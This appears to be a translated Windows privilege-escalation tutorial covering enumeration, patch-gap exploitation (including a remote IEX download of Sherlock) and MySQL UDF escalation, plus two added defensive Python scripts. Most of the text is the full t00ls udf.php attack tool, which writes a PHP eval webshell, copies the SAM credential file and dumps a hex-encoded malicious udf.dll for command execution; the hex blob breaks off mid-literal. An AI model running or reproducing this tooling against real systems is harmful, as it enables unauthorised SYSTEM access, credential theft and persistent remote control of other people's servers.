Windows Privilege Escalation Notes (Windows Privilege Escalation)


Privilege escalation basics

Privilege groups

  • Administrators: the administrators group; by default, members of Administrators have unrestricted, full access to the computer/domain.
  • Power Users: the power users group; Power Users can perform any operating system task except those reserved for the Administrators group.
  • Users: the standard users group; members of this group cannot make intentional or accidental system-wide changes.
  • Guests: the guests group; guests have the same access as ordinary members of Users, but the guest account is more restricted.
  • Everyone: all users; every user account on the computer belongs to this group.

Basic commands

$ query user               # show logged-on users
$ whoami                   # current user
$ set                      # environment variables
$ hostname                 # host name
$ systeminfo               # OS version and installed hotfixes
$ ver                      # OS version of the server
$ net user                 # local user accounts
$ net start                # services currently running
$ netstat -ano             # ports and connections, with owning PIDs
$ netstat -ano|find "3389" # look up a specific port
$ tasklist                 # list all running processes (map PIDs to ports with netstat -ano)
$ taskkill /im xxx.exe /f  # force-kill a process by image name
$ taskkill /pid pid        # kill the process with the given PID
$ tasklist /svc|find "TermService" # find the PID hosting a service
$ wmic os get caption              # OS name
$ wmic product get name,version    # installed software
$ wmic qfe get Description,HotFixID,InstalledOn # installed hotfixes
$ wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KB4346084" /C:"KB4509094" # check for specific hotfixes

# Add an administrator account
$ net user username password /add              # add a normal user
$ net localgroup administrators username /add  # add that user to the local Administrators group
# If RDP still refuses the connection, add the user to the Remote Desktop Users group
$ net localgroup "Remote Desktop Users" username /add

Privilege escalation via system vulnerabilities

Privilege escalation via system vulnerabilities relies on flaws in the operating system itself to gain higher privileges. The usual approach is to review the hotfix list from systeminfo, determine which patches are missing, and then run the exploit that matches the missing patch.

Checking patch information

  • WinSystemHelper: checks for exploitable vulnerabilities. The tool is suitable for detecting known privilege-escalation vulnerabilities on any Windows server.

WinSystemHelper list for Windows 2003:


KB2360937,MS10-084,https://technet.microsoft.com/library/security/ms10-084
KB2478960,MS11-014,https://technet.microsoft.com/library/security/MS11-014
KB2507938,MS11-056,https://technet.microsoft.com/library/security/MS11-056
KB2566454,MS11-062,https://technet.microsoft.com/library/security/MS11-062
KB2646524,MS12-003,https://technet.microsoft.com/library/security/MS12-003
KB2645640,MS12-009,https://technet.microsoft.com/library/security/MS12-009
KB2641653,MS12-018,https://technet.microsoft.com/library/security/MS12-018
KB944653,MS07-067,https://technet.microsoft.com/library/security/MS07-067
KB952004,MS09-012,https://technet.microsoft.com/library/security/MS09-012
KB971657,MS09-041,https://technet.microsoft.com/library/security/MS09-041
KB2620712,MS11-097,https://technet.microsoft.com/library/security/MS11-097
KB2393802,MS11-011,https://technet.microsoft.com/library/security/MS11-011
kb942831,MS08-005,https://technet.microsoft.com/library/security/MS08-005
KB2503665,MS11-046,https://technet.microsoft.com/library/security/MS11-046
KB2592799,MS11-080,https://technet.microsoft.com/library/security/MS11-080
KB956572,MS09-012,https://technet.microsoft.com/library/security/MS09-012
KB2621440,MS12-020,https://technet.microsoft.com/library/security/MS12-020
KB977165,MS10-015,https://technet.microsoft.com/library/security/MS10-015

WinSystemHelper list for Windows 2003 and later:

KB3077657,MS15-077,https://technet.microsoft.com/library/security/MS15-077
KB3045171,MS15-051,https://technet.microsoft.com/library/security/MS15-051
KB3087039,MS15-097,https://technet.microsoft.com/library/security/MS15-097
KB3000061,MS14-058,https://technet.microsoft.com/library/security/MS14-058
KB2829361,MS13-046,https://technet.microsoft.com/library/security/MS13-046
KB2850851,MS13-053,https://technet.microsoft.com/library/security/MS13-053
KB2707511,MS12-042,https://technet.microsoft.com/library/security/MS12-042
KB970483,MS09-020,https://technet.microsoft.com/library/security/MS09-020
KB3124280,MS16-016,https://technet.microsoft.com/library/security/MS16-016
KB2124261,MS10-065,https://technet.microsoft.com/library/security/MS10-065
KB3139914,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140745,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140768,MS16-032,https://technet.microsoft.com/library/security/MS16-032
  • Upload WinSysHelper.bat, explt2003.txt and expgt2003.txt, run the bat and read the results
    • Then download any one of the exploits it lists as usable and run it
$ WinSysHelper.bat
  • Sherlock: a PowerShell script for local privilege escalation on Windows
    • Once it reports a vulnerability, use the corresponding exploit

Vulnerabilities Sherlock can currently scan for:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 – 6.10.3 Priv Esc
# Start PowerShell with the execution policy bypassed
$ powershell.exe -exec bypass

# Load the script from disk
$ Import-Module Sherlock.ps1

# Load the script remotely
$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

# Check for vulnerabilities; a VulnStatus of "Appears Vulnerable" means the host is affected
$ Find-AllVulns
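The patch-gap comparison WinSystemHelper performs against its KB lists, as an added Python example that is not the tool's own code: it reads lines in the explt2003.txt/expgt2003.txt format (KB,bulletin,URL), parses `wmic qfe` output, and reports bulletins for which none of the listed KBs is installed. It generalizes the tool's per-line check by treating several KBs listed for one bulletin (MS16-032 above) as alternatives; both inputs below are constructed samples.

```python
"""Patch-gap audit: which bulletins from a WinSystemHelper-style KB list
have no corresponding hotfix installed, according to `wmic qfe` output."""
import re

# Constructed excerpt in the expgt2003.txt format from the page: KB,bulletin,URL
KB_LIST = """\
KB3077657,MS15-077,https://technet.microsoft.com/library/security/MS15-077
KB3045171,MS15-051,https://technet.microsoft.com/library/security/MS15-051
KB3000061,MS14-058,https://technet.microsoft.com/library/security/MS14-058
KB3139914,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140745,MS16-032,https://technet.microsoft.com/library/security/MS16-032
KB3140768,MS16-032,https://technet.microsoft.com/library/security/MS16-032
"""

# Constructed sample of `wmic qfe get Description,HotFixID,InstalledOn` output
WMIC_QFE_OUTPUT = """\
Description      HotFixID   InstalledOn
Security Update  KB3045171  5/13/2015
Update           KB2999226  9/2/2015
Security Update  KB3140745  3/9/2016
"""

# Hotfix identifiers: "KB" followed by digits, case-insensitive (the list has "kb942831")
KB_RE = re.compile(r"\bKB(\d+)\b", re.IGNORECASE)


def parse_kb_list(text):
    """Map bulletin -> set of KB numbers that fix it.

    A bulletin may appear on several lines with different KBs (one per OS
    build); any one of them installed means the bulletin is patched.
    """
    fixes = {}
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) < 2:
            continue
        m = KB_RE.fullmatch(parts[0])
        if not m:
            continue
        fixes.setdefault(parts[1].upper(), set()).add(m.group(1))
    return fixes


def parse_installed(wmic_text):
    """Extract the installed KB numbers from wmic qfe output (column layout ignored)."""
    return {m.group(1) for m in KB_RE.finditer(wmic_text)}


def missing_bulletins(kb_list_text, wmic_text):
    """Bulletins for which no listed KB is present in the wmic output.

    An absent KB is a lead, not proof: a later cumulative update can
    supersede it, so confirm against the build's update history before
    treating the host as vulnerable.
    """
    fixes = parse_kb_list(kb_list_text)
    installed = parse_installed(wmic_text)
    return sorted(b for b, kbs in fixes.items() if kbs.isdisjoint(installed))


if __name__ == "__main__":
    for bulletin in missing_bulletins(KB_LIST, WMIC_QFE_OUTPUT):
        print("no hotfix found for", bulletin)
```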

Escalation steps

Besides checking the exact OS version and bitness each vulnerability applies to, in practice the exploit also has to be made AV-evasive and debugged beforehand; otherwise it may crash the target (blue screen).

[01]: KB2999226
[02]: KB976902
  • Then, based on the installed hotfix IDs and the target system, pick the matching exploit, download it and run it.
  • Also pay attention to how the exploit is run; there are generally a few forms:
    • Run the exe directly; on success it opens a new cmd window, and in that window you are SYSTEM
    • Run the exe from a webshell as xxx.exe whoami; on success the command runs directly, and changing the argument runs a different command
    • Use tools such as MSF
    • Special forms such as C++ source, Python scripts, PowerShell scripts

Database privilege escalation

MySQL

  • Prerequisite: the root password
  • Notes:
    • From MySQL 5.7 onward, secure-file-priv restricts where files can be written
    • From MySQL 5.7 onward, the password column of the system user table mysql.user was renamed from password to authentication_string

UDF privilege escalation

  • Principle: with root privileges, write udf.dll into a system directory; the function exported by udf.dll can then be used to invoke cmd
  • Conditions
    • OS versions: Win2000, WinXP, Win2003
    • An account with insert/delete privileges on MySQL, used to create and drop functions. Ideally root, or another account with root-equivalent privileges.
UDF webshell escalation
  • With a webshell already in place, the UDF shell can be uploaded directly
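From the defender's side, the sequence that udf.php issues (plugin_dir lookup, a blob staging table, a hex literal starting with the MZ header, INTO DUMPFILE of a .dll, CREATE FUNCTION ... SONAME, then a call to shell()) is visible in the MySQL general query log. The following added Python example, not from the page, scores each connection thread on those stages over constructed log lines in the 5.7+ general_log layout; it assumes general_log is enabled on the server.

```python
"""Flag MySQL connection threads whose queries follow the UDF-escalation
sequence (staging table, hex PE payload, dumpfile of a DLL, CREATE FUNCTION
... SONAME, call to the new function)."""
import re
from collections import defaultdict

# Constructed general_log lines: <timestamp>\t<thread_id> <command>\t<argument>.
# Thread 12 replays the udf.php sequence; 15 and 21 are ordinary application traffic.
SAMPLE_LOG = "\n".join([
    "2019-03-04T10:12:00.000001Z\t   12 Connect\troot@localhost on mysql using TCP/IP",
    "2019-03-04T10:12:01.000001Z\t   12 Query\tshow variables like \"plugin_dir\"",
    "2019-03-04T10:12:02.000001Z\t   12 Query\tcreate table udftmp (c blob)",
    "2019-03-04T10:12:03.000001Z\t   12 Query\tinsert into udftmp values(convert(0x4D5A90000300,char))",
    "2019-03-04T10:12:04.000001Z\t   12 Query\tselect c from udftmp into dumpfile 'C:\\\\mysql\\\\lib\\\\plugin\\\\udf.dll'",
    "2019-03-04T10:12:05.000001Z\t   12 Query\tCREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'",
    "2019-03-04T10:12:06.000001Z\t   12 Query\tselect shell('cmd','whoami')",
    "2019-03-04T10:12:07.000001Z\t   15 Query\tSELECT name FROM products WHERE id = 7",
    "2019-03-04T10:12:08.000001Z\t   21 Query\tselect * from orders into outfile '/tmp/orders.csv'",
])

LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<tid>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")

# Each stage of the udf.php flow as a pattern over the query text.
STAGES = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in [
    ("plugin_dir_recon", r"show\s+variables\s+like\s+['\"]plugin_dir['\"]"),
    ("blob_staging", r"create\s+table\s+\S+\s*\(\s*\w+\s+(?:long|medium|tiny)?blob\s*\)"),
    ("mz_hex_literal", r"\b0x4d5a"),                     # PE "MZ" header in a hex literal
    ("dll_write", r"into\s+dumpfile\s+['\"][^'\"]*\.dll['\"]"),
    ("udf_register", r"create\s+function\s+\w+\s+returns\s+\w+\s+soname\s"),
    ("func_table_tamper", r"(?:insert\s+into|create\s+table)\s+`?(?:mysql\.)?`?func\b`?"),
    ("udf_call", r"\b(?:shell|sys_exec|sys_eval)\s*\("),
    ("file_io", r"\binto\s+(?:out|dump)file\b|\bload_file\s*\("),  # weak on its own
]]


def stages_by_thread(log_text):
    """Return {thread_id: set of matched stage names} for threads with any match."""
    found = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") not in ("Query", "Execute"):
            continue
        for name, pattern in STAGES:
            if pattern.search(m.group("arg")):
                found[m.group("tid")].add(name)
    return dict(found)


def flagged_threads(log_text, min_stages=3):
    """Threads that registered a UDF, or hit at least min_stages distinct stages.

    A lone INTO OUTFILE (a report export) stays below the threshold; the
    SONAME registration is decisive on its own because legitimate UDF
    installs are rare and should be change-controlled.
    """
    return {tid: sorted(stages)
            for tid, stages in stages_by_thread(log_text).items()
            if "udf_register" in stages or len(stages) >= min_stages}


if __name__ == "__main__":
    for tid, stages in flagged_threads(SAMPLE_LOG).items():
        print("thread", tid, "matched:", ", ".join(stages))
```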
udf.php
<?php
//t00ls...................
session_start();?>
<html>
<head>
<title>T00ls UDF.PHP</title>
<style type="text/css">
input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
</style>
<script type="text/javascript">
function outfile(){
	document.getElementById("sql2").value= unescape("select%20%27%3C%3Fphp%20eval%28%24_POST%5B%5C%27pass%5C%27%5D%29%3F%3E%27%20into%20outfile%20%27d%3A%5C%5Cninty.php%27");
}
function loadfile(){
	document.getElementById("sql2").value = unescape("select%20load_file%28%27c%3A%5C%5Cboot.ini%27%29");
}
</script>
</head>
<body>
<?php
error_reporting(0);
if (isset($_REQUEST['action']))
	$action = $_REQUEST['action'];
else
	$action = 'vConn';
switch ($action) {
	case 'vConn':
		vConn();
		break;
	case 'conn':
		conn();
		break;
	case 'exec':
		execsql();
		break;
	case 'install':
		install();
		break;
	case 'copy':
		cp();
		break;
	case 'cplug':
		cplug();
		break;
	case 'logout':
		logout();
		break;
	case 'func':
		func();
		break;
}
function vConn() {
	echo 'by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn">
<tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td>&nbsp;</td></tr></table></form>';
}
function func(){
	$conn = conn(false);
	mysql_select_db('mysql',$conn);
	mysql_query('CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \'\', `ret` tinyint(1) NOT NULL default \'0\', `dl` char(128) collate utf8_bin NOT NULL default \'\', `type` enum(\'function\',\'aggregate\') character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'User defined functions\'');
	if (mysql_errno($conn) != 0) {
		echo mysql_error() . '<br/>';
	}
	echo 'Create mysql.func success !';
	mysql_close($conn);
}
function conn($close = true) {
	if (isset($_SESSION['host'])) {
		$host = $_SESSION['host'];
		$uid = $_SESSION['uid'];
		$pwd = $_SESSION['pwd'];
		$db = $_SESSION['db'];
	} else {
		$host = $_POST['host'];
		$uid = $_POST['uid'];
		$pwd = $_POST['pwd'];
		$db = $_POST['db'];
	}
	$conn = mysql_connect($host,$uid,$pwd);
	if (!$conn) {
		echo mysql_error().'<br/>';
		vConn();
		exit();
	} 
	mysql_select_db($db,$conn);
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		vConn();
		exit();
	}
	$_SESSION['host'] = $host;
	$_SESSION['uid'] = $uid;
	$_SESSION['pwd'] = $pwd;
	$_SESSION['db'] = $db;
	//mysql_query('set names utf8');
	showM($conn,$close);
	return $conn;
}
function logout(){
	unset($_SESSION['host']);
	unset($_SESSION['uid']);
	unset($_SESSION['pwd']);
	unset($_SESSION['db']);
	unset($_SESSION['notsame']);
	unset($_SESSION['over51']);
	unset($_SESSION['plugindir']);
	$url = $_SERVER['PHP_SELF']; 
	$filename = end(explode('/',$url));  
	echo '<script>location.href = "'.$filename.'?rn="+Math.random()</script>';
}
function showM(&$conn,$close = true){
	echo '<center><b>t00ls UDF.PHP</b></center>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>';
	echo '<div style="border:solid 1px #333;background-color:#999;padding:4px">';
	$sql = 'select concat(\'<b>user()</b>:\',user()) as m union select concat(\'<b>database():</b>\',database()) union select concat(\'<b>datadir</b>:\',@@datadir) union select concat(\'<b>basedir</b>:\',@@basedir) union select concat(\'<b>version()</b>:\',version()) ;';
	$meta = mysql_query($sql,$conn);
	$tmp = 1;
	while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) {
		echo $row['m'];
		if ($tmp == 1) {
			$tmp = 2;
			$h = substr($row['m'],strpos($row['m'],'@')+1);
			if ($h != 'localhost') {
				echo ' <b><i><font color=green>[web and db is not the same server.]</font></i></b>';
			$_SESSION['notsame'] = 'true';
			}
		}
		echo '<br/>';
	}
	echo '<b>plugin_dir</b>:';
	$meta = mysql_query('show variables like "plugin_dir"');
	if (mysql_num_rows($meta)==0) {
		echo '<font color=white>mysql is under 5.1 , ';
		if (!isset($_SESSION['notsame']))
			echo ' u can dump udf.dll to any directory in follow paths';
		echo '</font>';
	} else {
		//over 5.1
		$_SESSION['over51'] = 'true';
		$row = mysql_fetch_row($meta);
		$_SESSION['plugindir'] = str_replace('\\','\\\\',str_replace('/','\\',$row[1])).'\\\\udf.dll';
		echo '<font color=white>'.str_replace('/','\\',$row[1]).'</font>';
		echo ' (mysql over 5.1, udf.dll can only dump to plugin_dir) ';
		if (isset($_SESSION['notsame'])) 
			echo ' <font><b><i>[maybe dump dll will be failed!]</i></b></font>';
		else {
			if (!file_exists(str_replace('/','\\',$row[1]))) 
				echo ' <a href="?action=cplug&dir='.base64_encode(str_replace('/','\\',$row[1])).'">Create PluginDir</a>';
			else 
				echo ' exists!';
		}
	}
	echo '<br/>';
	if (!isset($_SESSION['notsame']) && !isset($_SESSION['over51']))
		echo '<b>path</b>:<font color=green><b>'.getenv('path').'</b></font><br/>';
 	$meta = mysql_query('select 1,1,1,1 from mysql.user union select * from mysql.func');
	if (mysql_num_rows($meta)==0)
		echo '<b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!';
	else 
		echo '<b>Mysql.Func</b> : <font color=green>exist!</font>';
	echo '<br/>';
	echo '<b>grants</b> : <font color=white>';
	$meta = mysql_query('show grants;',$conn);
	while ($row = mysql_fetch_row($meta)) {
		echo $row[0];
	}
	echo '</font>';
	echo '</div>';
	if ($close)
		mysql_close($conn);
	echo '<br/>';
	if (isset($_POST['path'])) {
		$path = $_POST['path'];
		if (get_magic_quotes_gpc()) 
			$path = stripslashes($path);
	}
	else
		$path = isset($_SESSION['plugindir']) ? $_SESSION['plugindir'] : 'c:\\\\windows\\\\system32\\\\udf.dll';
	echo '<div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value="'.$path.'"> <input type="submit" value="Dump UDF"></form>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \'udf.dll\'"> <input type="submit" value="Create Function"></form>';
	echo '<form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30>  <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>';
	if (isset($_POST['sql']))
		$sql = $_POST['sql'];
	else
		$sql = 'select * from mysql.user';
	if (get_magic_quotes_gpc())
		$sql = stripslashes($sql);
	if (isset($_POST['dump']))
		$sql = 'select shell(\'cmd\',\'whoami\')';
	echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" rows="5" name="sql">'.$sql.'</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>';
}
function cplug(){
	$path = $_GET['dir'];
	$path = base64_decode($path);
	$arr = explode('\\',$path);
	$p = '';
	$err = '';
	for ($index = 0,$count = count($arr);$index<$count;$index++) {
		$p .= ($arr[$index] . '\\');
		if (!file_exists($p)) {
			if (!mkdir($p)) {
				$err = 'create '.$p.'failed !';
				break;
			}
		}
	}
	conn();
	if ($err != '')
		exit($err);
	if (file_exists($path))
		echo 'plugin_dir create success !';
	else
		echo 'plugin_dir create failed !';
}
function execsql() {
	$conn = conn(false);
	$sql = $_POST['sql'];
	if (get_magic_quotes_gpc())
		$sql = stripslashes($sql);
	$rs = mysql_query($sql,$conn);
	echo mysql_info($conn);
	if (@mysql_num_rows($rs) > 0) {
		echo '<table border="1">';
		$cols = mysql_num_fields($rs);
		$index = 0;
		echo '<tr>';
		while ($index < $cols) {
			echo '<th>'.mysql_field_name($rs,$index).'</th>';
			$index ++;
		}
		echo '</tr>';
		while ($row = mysql_fetch_row($rs)) {
			$index = 0;
			echo '<tr>';
			while ($index < $cols) {
				echo '<td>';
				echo str_replace(chr(13),'<br/>',htmlspecialchars($row[$index]));
				echo '</td>';
				$index ++;
			}
			echo '</tr>';
 		}
		echo '</table>';
	}
	if (mysql_errno($conn) != 0)
		echo mysql_error();
	mysql_close($conn);
}
function cp(){
	$conn = conn(false);
	$source = $_POST['source'];
	$target = $_POST['target'];
	if (get_magic_quotes_gpc()) {
		$source = stripslashes($source);
		$target = stripslashes($target);
	}
	mysql_query('select unhex(hex(load_file("'.$source.'"))) into dumpfile "'.$target.'"');
	if (mysql_errno($conn) != 0)
		echo mysql_error().'<br/>';
	else
		echo 'done !';
	mysql_close($conn);
}
function install() {
//dump udf.dll
	$conn = conn(false);
	$path = $_POST['path'];
	if (get_magic_quotes_gpc()) 
		$path = stripslashes($path);
	mysql_query('create table udftmp (c blob)');
	if (mysql_errno($conn) != 0) {
		echo mysql_error().'<br/>';
		mysql_query('drop table udftmp');
		mysql_close($conn);
		exit();
	}
	// udf.dll bytes supplied as one hex literal (binary blob elided here; the page is cut off inside it)
	mysql_query('insert into udftmp values(convert(0x...
0092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D65202020
20202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E6773
2E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572
726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D62
